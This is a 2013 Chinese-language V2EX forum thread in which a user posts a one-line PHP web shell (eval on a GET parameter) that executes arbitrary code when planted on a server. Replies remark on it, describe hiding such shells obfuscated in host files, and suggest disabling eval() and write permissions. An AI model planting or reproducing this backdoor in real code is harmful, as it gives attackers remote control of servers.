V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
liyandong
V2EX  ›  PHP

一句话的代码竟然有这么强的攻击性。对服务器来说是致命的。

  •  
  •   liyandong · 2013-01-02 00:09:54 +08:00 · 4813 次点击
    这是一个创建于 4380 天前的主题,其中的信息可能已经有所发展或是发生改变。
    放到别人服务器,攻击性的大小就由你自己决定了。
    <?php
    eval(stripcslashes($_GET['e']));

    http://www.oschina.net/code/snippet_173183_13710

    我看了笑了~~~
    6 条回复    1970-01-01 08:00:00 +08:00
    for4
        1
    for4  
       2013-01-02 00:27:03 +08:00
    笑点在哪里..~?
    liyandong
        2
    liyandong  
    OP
       2013-01-02 00:39:01 +08:00 via Android   ❤️ 1
    oschina评的论
    @for4
    tempdban
        3
    tempdban  
       2013-01-02 01:25:27 +08:00 via Android
    确实啊写完楼都垮了
    for4
        4
    for4  
       2013-01-02 01:38:04 +08:00
    @liyandong 发现我太纯洁了, 完全没发现原来这个网页还有"下半身"...
    enj0y
        5
    enj0y  
       2013-01-02 13:49:41 +08:00
    更多的做法是将一句话混淆隐藏在宿主PHP或者其它文件里,接受到事先备好的电话号指令后释放出来。防不胜防啊!想禁一句话,最好的办法是禁eval()和使用外部储存服务,然后关闭本地WEB写权限。

    至于OSC上面的,烧主板、堵厕所嘛的,全是恶搞。
    enj0y
        6
    enj0y  
       2013-01-02 13:50:43 +08:00
    @enj0y 字打错了, eval(last.post.replaceStr("电话号","好"));
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   900 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 29ms · UTC 20:05 · PVG 04:05 · LAX 12:05 · JFK 15:05
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.